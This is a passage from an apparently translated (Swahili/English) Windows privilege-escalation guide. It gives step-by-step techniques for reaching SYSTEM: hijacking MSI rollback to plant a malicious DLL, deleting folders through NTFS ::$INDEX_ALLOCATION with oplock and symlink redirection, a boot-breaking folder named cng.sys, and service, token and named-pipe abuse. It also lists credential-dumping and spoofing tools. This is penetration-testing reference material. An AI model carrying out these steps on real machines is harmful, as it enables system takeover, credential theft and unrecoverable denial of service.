Unapopokelewa ishara, fungua faili ya .rbf bila FILE_SHARE_DELETE — hii inazuia ifutwe.
Kisha ashiria tena ili uninstall iendelee.
Windows Installer inashindwa kufuta .rbf, na kwa sababu haiwezi kufuta yote yaliyomo, C:\Config.Msi haiondoki.
Step 5: Manually Delete .rbf
Wewe (mshambuliaji) unafuta .rbf kwa mikono.
Sasa C:\Config.Msi ni tupu, tayari kuporwa.

At this point, trigger the SYSTEM-level arbitrary folder delete vulnerability to delete C:\Config.Msi.

Stage 2 – Replacing Rollback Scripts with Malicious Ones

Step 6: Recreate C:\Config.Msi with Weak ACLs
Reunda C:\Config.Msi mwenyewe.
Weka weak DACLs (mfano, Everyone:F), na weka handle wazi yenye WRITE_DAC.
Step 7: Run Another Install
Sakinisha .msi tena, ukiweka:
TARGETDIR: Mahali kinachoweza kuandikwa.
ERROROUT: Kigezo kinachosababisha kushindwa kwa lazima.
Sakinisho hili litumike kusababisha rollback tena, ambayo husoma .rbs na .rbf.
Step 8: Monitor for .rbs
Tumia ReadDirectoryChangesW kufuatilia C:\Config.Msi hadi .rbs mpya itaonekana.
Rekodi jina lake.
Step 9: Sync Before Rollback
.msi ina custom install action (SyncBeforeRollback) ambayo:
Inaashiria event wakati .rbs imetengenezwa.
Kisha inasubiri kabla ya kuendelea.
Step 10: Reapply Weak ACL
Baada ya kupokea event ya .rbs created:
Windows Installer inarudisha ACL zenye nguvu kwa C:\Config.Msi.
Lakini kwa kuwa bado una handle yenye WRITE_DAC, unaweza kuweka tena weak ACLs tena.

ACLs are only enforced on handle open, so you can still write to the folder.

Step 11: Drop Fake .rbs and .rbf
Sambaza juu ya faili .rbs na fake rollback script ambayo inaelekeza Windows:
Kurejesha .rbf yako (malicious DLL) hadi mahali lenye haki zaidi (mfano, C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).
Kuacha .rbf bandia lenye malicious SYSTEM-level payload DLL.
Step 12: Trigger the Rollback
Ashiria event ya sync ili installer iendelee.
A type 19 custom action (ErrorOut) imepangwa kusababisha kushindwa kwa kusakinisha kwa makusudi mahali fulani.
Hii inasababisha rollback kuanza.
Step 13: SYSTEM Installs Your DLL
Windows Installer:
Inasoma .rbs yako ya kibaya.
Inakopa DLL yako .rbf hadi kwenye eneo lengwa.
Sasa una malicious DLL katika path inayoloadwa na SYSTEM.
Final Step: Execute SYSTEM Code
Endesha binary yenye kuaminika na auto-elevated (mfano, osk.exe) ambayo inaloda DLL uliyepora.
Boom: Msimbo wako unatekelezwa kama SYSTEM.

From Arbitrary File Delete/Move/Rename to SYSTEM EoP

The main MSI rollback technique (the previous one) assumes you can delete an entire folder (e.g., C:\Config.Msi). But what if your vulnerability only allows arbitrary file deletion ?

Unaweza kutumia NTFS internals: kila folda ina alternate data stream iliyofichwa iitwayo:

C:\SomeFolder::$INDEX_ALLOCATION

Huu stream unahifadhi metadata ya index ya folda.

Kwa hivyo, ikiwa utaifuta stream ::$INDEX_ALLOCATION ya folda, NTFS itaondoa folda nzima kutoka kwenye mfumo wa faili.

Unaweza kufanya hivyo kwa kutumia API za kawaida za kufuta faili kama:

DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");

Ingawa unaitisha file delete API, inafuta kabrasha lenyewe.

Kutoka Folder Contents Delete hadi SYSTEM EoP

Je, vipi kama primitive yako haikuwezeshi kufuta faili/kabrasha yoyote, lakini inaruhusu kufutwa kwa yaliyomo ya kabrasha linalodhibitiwa na mshambuliaji?

Hatua 1: Tengeneza bait folder na file

Create: C:\temp\folder1
Inside it: C:\temp\folder1\file1.txt

Hatua 2: Weka oplock kwenye file1.txt

Oplock inasimamisha utekelezaji wakati mchakato wenye ruhusa za juu unajaribu kufuta file1.txt.

// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();

Hatua 3: Chochea mchakato wa SYSTEM (mfano, SilentCleanup)

Mchakato huu husaka folda (mfano, %TEMP%) na hujaribu kufuta yaliyomo ndani yao.
Inapoifikia file1.txt, oplock huamsha na inakabidhi udhibiti kwa callback yako.

Hatua 4: Ndani ya callback ya oplock – elekeza upya ufutaji

Chaguo A: Hamisha file1.txt mahali pengine
Hii inafanya folder1 kuwa tupu bila kuvunja oplock.
Usifute file1.txt moja kwa moja — hilo lingeachilia oplock mapema.
Chaguo B: Geuza folder1 kuwa junction:

# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control

Chaguo C: Unda symlink katika \RPC Control:

# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")

Hii inalenga mtiririko wa ndani wa NTFS unaohifadhi metadata ya folda — kuifuta kunaifuta folda.

Hatua 5: Kuachilia oplock

Mchakato wa SYSTEM unaendelea na unajaribu kufuta file1.txt.
Lakini sasa, kutokana na junction + symlink, kwa kweli inafuta:

C:\Config.Msi::$INDEX_ALLOCATION

Matokeo: C:\Config.Msi imefutwa na SYSTEM.

Kutoka Uundaji wa Folda Kiajali hadi DoS ya Kudumu

Tumia primitive inayokuruhusu kuunda folda kiajali kama SYSTEM/admin — hata kama huwezi kuandika faili au kuweka ruhusa dhaifu.

Unda folda (si faili) yenye jina la critical Windows driver, kwa mfano:

C:\Windows\System32\cng.sys

Njia hii kawaida inalingana na driver ya kernel-mode cng.sys.
Ikiwa utaiunda kabla kama folda, Windows itashindwa kupakia dereva halisi wakati wa boot.
Kisha, Windows inajaribu kupakia cng.sys wakati wa boot.
Inapoiona folda, inashindwa kutambua dereva halisi, na inasababisha crash au kusimamisha mchakato wa boot.
Hakuna njia mbadala, na hakuna urejeshaji bila uingiliaji wa nje (kwa mfano, ukarabati wa boot au ufikiaji wa diski).

Kutoka High Integrity hadi System

Huduma mpya

Ikiwa tayari unafanya kazi kwenye mchakato wa High Integrity, njia ya kufikia SYSTEM inaweza kuwa rahisi kwa kuunda na kuendesha huduma mpya:

sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename

Tip

Wakati wa kuunda binary ya service hakikisha ni service halali au kwamba binary inafanya vitendo vinavyohitajika haraka kwani itauawa baada ya sekunde 20 ikiwa si service halali.

AlwaysInstallElevated

Kutoka kwenye mchakato wa High Integrity unaweza kujaribu kuwezesha vifunguo vya rejista vya AlwaysInstallElevated na kufunga reverse shell kwa kutumia wrapper ya .msi.
More information about the registry keys involved and how to install a .msi package here.

High + SeImpersonate privilege to System

Unaweza find the code here.

From SeDebug + SeImpersonate to Full Token privileges

Ikiwa una token privileges hizo (labda utazipata tayari katika mchakato wa High Integrity), utaweza kufungua karibu mchakato wowote (not protected processes) kwa SeDebug privilege, kunakili token ya mchakato, na kuunda mchakato wowote ulio na token hiyo.
Matumizi ya mbinu hii kwa kawaida hujumuisha kuchagua mchakato wowote unaoendesha kama SYSTEM ukiwa na token privileges zote (ndio, unaweza kupata mchakato za SYSTEM bila token privileges zote).
You can find an example of code executing the proposed technique here.

Named Pipes

Mbinu hii inatumiwa na meterpreter kuongeza hadhi katika getsystem. Mbinu inajumuisha kuunda pipe na kisha kuunda/kutumia service ili kuandika kwenye pipe hiyo. Kisha, server iliyounda pipe kwa kutumia the SeImpersonate privilege itakuwa na uwezo wa kujifanya token ya client wa pipe (service) na kupata haki za SYSTEM.
Ikiwa unataka learn more about name pipes you should read this.
Ikiwa unataka kuona mfano wa how to go from high integrity to System using name pipes you should read this.

Dll Hijacking

Ikiwa utafanikiwa kuhijack dll inayokuwa ikipakiwa na mchakato unaoendesha kama SYSTEM utaweza kutekeleza code yoyote kwa ruhusa hizo. Kwa hivyo Dll Hijacking pia ni muhimu kwa aina hii ya escalation ya ruhusa, na, zaidi ya hayo, ni rahisi zaidi kufikiwa kutoka kwa mchakato wa high integrity kwa sababu utakuwa na write permissions kwenye folda zinazotumika kupakia dlls.
You can learn more about Dll hijacking here.

From Administrator or Network Service to System

From LOCAL SERVICE or NETWORK SERVICE to full privs

Soma: https://github.com/itm4n/FullPowers

Msaada zaidi

Static impacket binaries

Zana muhimu

Zana bora ya kutafuta Windows local privilege escalation vectors: WinPEAS

PrivescCheck
PowerSploit-Privesc(PowerUP) -- Angalia makosa ya usanidi na mafaili nyeti (check here). Detected.
JAWS -- Angalia baadhi ya makosa ya usanidi na ukusanye taarifa (check here).
privesc -- Angalia makosa ya usanidi
SessionGopher -- Hutoa taarifa za vikao vilivyohifadhiwa vya PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP. Tumia -Thorough kwa local.
Invoke-WCMDump -- Hutoa credentials kutoka Credential Manager. Detected.
DomainPasswordSpray -- Spray nywila zilizokusanywa kwingine ndani ya domain
Inveigh -- Inveigh ni PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer na chombo cha man-in-the-middle.
WindowsEnum -- Uorodheshaji wa msingi wa privesc kwa Windows
~~Sherlock~~ ~~~~ -- Tafuta udhaifu wa privesc (DEPRECATED for Watson)
~~WINspect~~ -- Ukaguzi wa ndani (Inahitaji haki za Admin)

Exe

Watson -- Tafuta udhaifu wa privesc uliotambuliwa (inahitaji kujengwa kutumia VisualStudio) (precompiled)
SeatBelt -- Inasoma mwenyeji kutafuta makosa ya usanidi (ni zaidi chombo cha kukusanya taarifa kuliko privesc) (inahitaji kujengwa) (precompiled)
LaZagne -- Hutoa credentials kutoka kwa programu nyingi (exe precompiled kwenye github)
SharpUP -- Port ya PowerUp kwa C#
~~Beroot~~ ~~~~ -- Angalia makosa ya usanidi (exe imejengwa kabla kwenye github). Haipendekezwi. Haifanyi kazi vizuri katika Win10.
~~Windows-Privesc-Check~~ -- Angalia uwezekano wa makosa ya usanidi (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri katika Win10.

Bat

winPEASbat -- Zana iliyotengenezwa kwa msingi wa chapisho hili (haihitaji accesschk kufanya kazi vizuri lakini inaweza kuitumia).

Local

Windows-Exploit-Suggester -- Hufanya parsing ya matokeo ya systeminfo na kupendekeza exploits zinazofanya kazi (python local)
Windows Exploit Suggester Next Generation -- Hufanya parsing ya matokeo ya systeminfo na kupendekeza exploits zinazofanya kazi (python local)

Meterpreter

multi/recon/local_exploit_suggestor

Unapaswa kujenga mradi ukitumia toleo sahihi la .NET (see this). Ili kuona toleo la .NET lililosanidiwa kwenye mwenyeji wa mwathiri unaweza kufanya:

C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line

81 KiB Raw Blame History Unescape Escape

Windows Local Privilege Escalation

Best tool to look for Windows local privilege escalation vectors: WinPEAS

Nadhariya ya Awali ya Windows

Access Tokens

ACLs - DACLs/SACLs/ACEs

Integrity Levels

Udhibiti wa Usalama wa Windows

System Info

Version info enumeration

Version Exploits

Mazingira

Historia ya PowerShell

PowerShell Faili za Transcript

PowerShell Module Logging

PowerShell Script Block Logging

Mipangilio ya Intaneti

Diski

WSUS

Third-Party Auto-Updaters and Agent IPC (local privesc)

KrbRelayUp

AlwaysInstallElevated

Metasploit payloads

PowerUP

MSI Wrapper

Create MSI with WIX

Unda MSI kwa Visual Studio

Ufungaji wa MSI

Antivirus na Vigunduzi

Mipangilio ya Ukaguzi

WEF

LAPS

WDigest

LSA Protection

Credentials Guard

Cached Credentials

Watumiaji & Vikundi

Orodhesha Watumiaji & Vikundi

Vikundi vyenye mamlaka

Token manipulation

Watumiaji walioingia / Vikao

Folda za nyumbani

Sera ya Nywila

Pata yaliyomo kwenye clipboard

Michakato Zinazokimbia

Ruhusa za Faili na Folda

Memory Password mining

Programu za GUI zisizo salama

Huduma

Ruhusa

Kuwezesha huduma

Badilisha service binary path

Anzisha upya huduma

Ruhusa dhaifu za service binaries

Ruhusa za kubadilisha rejista ya huduma

Services registry AppendData/AddSubdirectory permissions

Unquoted Service Paths

Hatua za Kupona

Programu

Programu Zilizowekwa

Ruhusa za Kuandika

Endeshwa wakati wa kuanzishwa

Drivers

Kutumia kukosa FILE_DEVICE_SECURE_OPEN kwenye device objects (LPE + EDR kill)

PATH DLL Hijacking

Mtandao

Sehemu zilizoshirikiwa

hosts file

Kiolesura za Mtandao na DNS

Open Ports

Jedwali la Njia

Jedwali la ARP

Firewall Rules

Windows Subsystem for Linux (wsl)

Windows Credentials

Winlogon Credentials

Credentials manager / Windows vault

DPAPI

PowerShell Credentials

Mtandao wa Wi-Fi

81 KiB

Raw Blame History